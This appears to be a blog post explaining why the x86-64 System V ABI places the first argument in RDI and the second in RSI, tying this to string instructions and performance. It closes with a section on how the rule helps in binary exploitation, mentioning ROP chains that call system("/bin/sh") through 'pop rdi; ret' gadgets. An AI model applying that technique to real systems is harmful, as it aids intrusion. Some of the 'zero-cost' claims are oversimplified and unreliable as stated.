The “Unwritten Rule” of RDI as the First Argument

Created on Mar 5, 2026

Updated on Mar 5, 2026

By Vesper Vei

4 minutes read

Table of Contents

The “Unwritten Rule” of RDI as the First Argument
1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
3. Practical Significance: Impact on Pwn and Reverse Engineering
1. Summary Comparison Table

The “Unwritten Rule” of RDI as the First Argument
1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
3. Practical Significance: Impact on Pwn and Reverse Engineering
1. Summary Comparison Table

The “Unwritten Rule” of RDI as the First Argument

This question gets to the core of low-level design. Why is it specifically defined that RDI is the first argument and RSI is the second? Why not randomly pick two registers instead, such as R8 and R9?

The reasons behind this can mainly be summarized in two points: the continuation of hardware legacy and extreme performance optimization.

1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions

In C, the operational logic of many fundamental functions is “destination $\leftarrow$ source”. The most typical example is memcpy(dest, src, size).

RDI: the D stands for Destination.
RSI: the S stands for Source.

The brilliance of the design:

The x86 architecture has some very powerful built-in “string instructions” (such as movsb). These instructions are hard-wired into the CPU circuitry, and they mandate the use of RSI as the source and RDI as the destination.

If the calling convention (ABI) specifies that the first argument goes into RDI and the second into RSI, then when you write memcpy(dest, src, n):

dest is already in RDI.
src is already in RSI.
The CPU does not need to spend extra time issuing mov instructions to swap register values; it can start copying immediately with a single hardware instruction.

Conclusion: this design allows high-frequency C functions (such as string processing and memory copying) to connect directly to the CPU’s hardware-accelerated instructions.

2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”

In the old 32-bit (x86) era, function arguments were placed on the stack.

Drawback: the stack resides in memory, and CPU access to memory is far slower than access to registers. Every function call required writing to memory and reading from memory, which was highly wasteful.

By the 64-bit (x86-64) era, more registers became available. Engineers established a set of rules (the System V ABI) that requires the first 6 arguments to be passed through registers.

Why this particular order?

It works like a “standard protocol.” Without such a rule:

Programmer A might write a function assuming the first argument is in RAX.
Programmer B might write code that passes the argument in RBX.
Result: the program crashes immediately.

The purpose of uniformly specifying RDI, RSI, … is to ensure that compilers, operating systems, and code written in different languages can communicate with each other seamlessly. It is like everyone agreeing to drive on the right side of the road.

3. Practical Significance: Impact on Pwn and Reverse Engineering

For students learning binary security (Pwn), understanding this is crucial:

Finding gadgets: when constructing a ROP chain, you often need to control the first argument (for example, system("/bin/sh")). Since you know the rule is RDI, you will specifically look for instruction snippets like pop rdi; ret.
Quickly locating vulnerabilities: when you see code in a disassembler (such as IDA) passing a strange address into RDI and then calling a function, you can immediately realize: “Oh, it is setting up the first argument of that function.”

Summary Comparison Table

Dimension	Old Era (32-bit/x86)	New Era (64-bit/x86-64)	Benefits
Storage location	Memory stack (Stack)	Registers (RDI, RSI…)	Fast (register access is on the nanosecond scale)
Instruction count	Requires multiple push/pop operations	Simple mov is enough	Smaller code size and higher execution efficiency
Logical consistency	Arbitrary	Strictly follows Dest/Source logic	Hardware-level optimization, reducing the cost of data movement

Would you like to see how the CPU is “forced” to use the memory stack to handle arguments when there are more than 6 of them (and registers are no longer sufficient)?

—> When There Are More Than 6 Parameters, the Memory Stack Is "Forced" Into Use —> 参数从右往左压栈道”设计心机”

The “Unwritten Rule” of RDI as the First Argument

Table of Contents

The “Unwritten Rule” of RDI as the First Argument

1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions

2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”

3. Practical Significance: Impact on Pwn and Reverse Engineering

Summary Comparison Table

Relationship Graph